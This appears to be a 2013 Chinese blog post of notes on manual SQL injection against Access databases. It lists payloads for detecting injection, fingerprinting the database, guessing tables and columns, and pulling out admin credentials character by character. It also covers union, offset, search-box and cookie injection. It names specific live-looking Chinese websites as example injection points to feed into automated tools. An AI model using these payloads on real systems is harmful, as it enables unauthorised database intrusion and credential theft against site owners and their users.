2013年2月12日星期二

access手工注入基础整理

                              

一.判断注入
    数字型查询  and 1=1 and 1=2
    字符型查询  'and '1'='1  'and'1'='2


二.数据库类型的判断
    1.普通报错
      JET引擎连接数据库      access
      ODBC引擎连接数据库     mssql
    2.手工猜解
          ;--
       mssql数据库里   ;为语句间分隔符 --为解释符           
       所以mssql返回正确,access返回错误
    3.access和mssql差异查询
       and exists (select * from sysobjects)      mssql返回无法读取
       and exists (select * from mysysobjects)    access返回无权限

三.access数据库手工注入(通用)
    1.猜表
        and exists (select * from 表名)      
  
    2.猜列
        and (select 列名 from 表名)
    
    3.猜列个数
       and (select 列名 from 表名)=X                                 管理员个数

    3.猜列长度
        and (select top 1 len(列名) from 表名)=X  一般密码都md5加密16 32 40     位 用户名一般5位admin
    4.猜字段内容
        and (select top 1 asc(mid(列名,x,1)) from 表名)=xx  中文asc负数abs()函数

四.access数据库联合查询注入
    1.猜列个数
        排序法     order by X    
        覆盖法    and 1=2 union select 1,2,3,....x from 表名
    2.猜字段内容
       and 1=2 union select 1,2,3,4,..x from 表名

五. access偏移注入
   1.从后往前偏移
  -x       第一次  *前移自减直到显示出数据   x即admin中的列
  -x-x     第二次  from (admin as a inner join admin as b on a.id=b.id)  无数据 再 在*前添加 *-1或a.id,b.id,  为了打得更乱
  -x-x-x   第三次  from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id =b.id)  无数据再添c.id
  -x-x-x-x 第四次  from(((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id =b.id) inner join admin as                  
                   d on a.id=d.id)  无数据再添d.id
 
   2.从前往后偏移
 and 1=2 union select *from( from (admin as a inner join admin as b on a.id=b.id )

 and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select * from admin) as c on c.id=a.id

六.搜索型注入
   1.判断存在
     %' and 1=1 and '%'='
     %' and 1=2 and '%'='
     a%' and 1=1-- 正常
     a%' and 1=2-- 错误

   2.get搜索型手工注入
       猜表列
            1%'and(select count(列名)from 表名)>0 and '%'='
       猜列名长度
            1%'and(select top 1 len(列名)from 表名) and '%'='
       猜字段
            1%'and(select top 1 asc(mid(列名,N,1))from 表名)>X and '%'='

   3.get搜索型工具注入
       注入点
          http://www.sctone.com.cn/sctone/News_search.asp?key=1&otype=title&  amp;Submit=Search
       两种修改注入点关键字放最后 
          http://www.sctone.com.cn/sctone/News_search.asp?otype=title&Submit=Search&key=1
          http://www.sctone.com.cn/sctone/News_search.asp?key=1
       放进工具跑
       nbsi  hdsi  穿山甲
   4.post搜索型工具注入
       wsockexpert抓包 把关键字放到url的后面
           http://www.cnaec.com.cn/Work/refer/Search/2.asp
           http://www.cnaec.com.cn/Work/refer/Search/2.asp?KeyWord=1
       放到工具跑
       nbsi  hdsi   pangolin
七.cookies注入
   1.cookies的注入语句:
      javascript:alert(document.cookie="id="+escape("ID值 and 注入攻击代码"));
   2.cookies工具注入
      利用cookies注入中转工具修改url
      本地搭建服务器
  

没有评论:

发表评论

Blogger 提供支持.

This is me

© Manuel